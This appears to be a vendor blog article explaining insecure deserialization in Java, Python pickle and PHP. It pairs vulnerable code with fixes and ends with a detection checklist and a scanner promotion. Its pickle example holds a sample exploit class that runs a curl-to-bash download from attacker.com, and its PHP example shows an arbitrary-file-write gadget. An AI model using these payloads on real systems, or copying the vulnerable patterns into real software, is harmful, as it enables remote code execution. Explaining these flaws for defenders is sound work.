What Deserialization Is
Serialization is the process of converting an in-memory object into a byte stream or text format that can be stored or transmitted. Deserialization is the reverse β reconstructing an object from that byte stream. Languages like Java, Python, PHP, Ruby, and .NET all have built-in serialization mechanisms.
Applications use serialization for lots of legitimate purposes: storing session state in cookies, passing objects between microservices, caching complex objects in Redis, message queues, RPC calls. It's everywhere once you start looking.
OWASP A08:2021: Insecure Deserialization was A08 in the 2017 list and moved into "Software and Data Integrity Failures" (A08) in 2021. High severity, relatively lower incidence than injection β but when it's exploitable, it's typically full RCE.
Why Deserialization Is Dangerous
The core problem is that deserialization typically reconstructs a full object graph β including invoking constructors, setters, and magic methods β before your application code gets to validate the input. By the time you check whether the deserialized object looks legitimate, the damage may already be done.
If an attacker can control the serialized bytes fed into your deserializer, they can potentially craft a byte stream that, when deserialized, executes arbitrary code as a side effect of object reconstruction. This isn't a logic error in your code β it's the serialization mechanism itself being weaponised.
This is a real pattern in breaches: The Apache Commons Collections vulnerability (CVE-2015-4852) affected virtually every Java application server of the era β WebSphere, WebLogic, JBoss, Jenkins. Thousands of organisations were running unauthenticated Java deserialization endpoints. Attackers hit them automatically.
Java Deserialization (the Classic)
Java's built-in serialization uses ObjectInputStream.readObject(). If an attacker can control the bytes being read, they can trigger a gadget chain β a sequence of classes already on the classpath whose methods, when chained together during deserialization, execute arbitrary OS commands.
import java.io.*; // Vulnerable β deserializes untrusted bytes directly public Object deserialize(byte[] data) throws Exception { ByteArrayInputStream bis = new ByteArrayInputStream(data); ObjectInputStream ois = new ObjectInputStream(bis); return ois.readObject(); // Attacker controls data β RCE possible } // This pattern is also common in session handling: // String cookieVal = request.getCookie("session"); // Object session = deserialize(Base64.decode(cookieVal)); // β critical bug
Tools like ysoserial can generate exploit payloads for many common Java gadget chains (Commons Collections, Spring, Groovy, etc.). An attacker just needs to know which libraries are on your classpath.
Python Pickle β The Obvious Problem Nobody Fixes
Python's pickle module is explicit about the risk in its own documentation: "Never unpickle data received from an untrusted or unauthenticated source." And yet it shows up in codebases constantly β in ML model serving, in caching layers, in task queues.
import pickle, os # What an attacker's crafted payload looks like class Exploit(object): def __reduce__(self): return (os.system, ("curl http://attacker.com/shell.sh | bash",)) payload = pickle.dumps(Exploit()) # Vulnerable endpoint deserializes user-controlled data def load_session(session_bytes: bytes): return pickle.loads(session_bytes) # RCE if attacker controls input # Fixed β use JSON for session data, not pickle import json def load_session_safe(session_str: str) -> dict: return json.loads(session_str)
ML model serving is a hotspot: Many ML pipelines pickle model objects. If your model serving endpoint loads user-provided model files, they can contain arbitrary code. Use ONNX, SafeTensors, or model registries with content validation instead of raw pickle for user-supplied inputs.
PHP Object Injection
PHP's unserialize() reconstructs PHP objects from a string representation. If a class has magic methods like __wakeup(), __destruct(), or __toString() that perform dangerous operations, and an attacker can craft the serialized string to instantiate that class, those methods get called automatically during deserialization.
// Vulnerable β user-controlled cookie deserialized $data = unserialize(base64_decode($_COOKIE['user_prefs'])); // A class elsewhere in the codebase with a dangerous __destruct: class FileLogger { public $logFile; public $logData; public function __destruct() { file_put_contents($this->logFile, $this->logData); // write anything anywhere } } // Fixed β use json_decode for structured data from cookies $data = json_decode(base64_decode($_COOKIE['user_prefs']), true);
How Gadget Chains Work
You don't need a deliberately malicious class to exploit deserialization. Attackers chain together methods from legitimate classes already in your dependency tree β "gadgets" β where the output of one feeds into the next, ultimately reaching a code execution sink.
For Java, the gadgets come from widely-used libraries: Apache Commons Collections, Spring Framework, Groovy. Tools like ysoserial automate generating payloads for dozens of known chains. For PHP, POP (Property-Oriented Programming) chains work similarly.
The implication: you can't fix this by "not using dangerous classes." The libraries you use for completely unrelated purposes contain the gadgets. The only real fix is to not deserialize untrusted data at all.
Safe Deserialization Patterns
The primary fix is architectural: don't pass attacker-controlled data to native deserializers.
- Use JSON or MessagePack for structured data passing. JSON parsers reconstruct data structures, not arbitrary objects β no code execution risk.
- Sign serialized data with HMAC before storing/transmitting. Verify the signature before deserializing. An attacker can't forge a valid signature without your key.
- For Java, use serialization filters (JEP 290, available since Java 9). Configure an allowlist of classes permitted to deserialize.
- For Python, use safer alternatives to pickle: JSON, msgpack, or for complex objects, dataclasses + JSON.
import json, hmac, hashlib, os SECRET = os.environ["SESSION_SECRET"] def serialize_session(data: dict) -> str: payload = json.dumps(data) sig = hmac.new(SECRET.encode(), payload.encode(), hashlib.sha256).hexdigest() return f"{payload}.{sig}" def deserialize_session(token: str) -> dict: try: payload, sig = token.rsplit(".", 1) expected = hmac.new(SECRET.encode(), payload.encode(), hashlib.sha256).hexdigest() if not hmac.compare_digest(sig, expected): raise ValueError("Invalid signature") return json.loads(payload) except: raise ValueError("Invalid session")
Detection Checklist
- Audit all deserialization points β grep for
pickle.loads,ObjectInputStream,unserialize(,Marshal.load,YAML.load - Check where deserialized data originates β anything from HTTP requests, cookies, file uploads, or external queues is attacker-controlled
- Replace pickle with JSON β for any data that doesn't genuinely need object serialization
- Sign data before serializing, verify before deserializing β HMAC provides integrity
- Implement Java serialization filters β allowlist only necessary classes
- Run SAST in CI β catch dangerous deserialization patterns automatically
- Monitor for serialization-related exceptions β malformed payloads during probing often generate distinctive errors
Find Dangerous Deserialization in Your Codebase
AquilaX SAST detects unsafe deserialization patterns in Java, Python, PHP, and Ruby β flagging every dangerous pattern before it reaches production.
Start Free Scan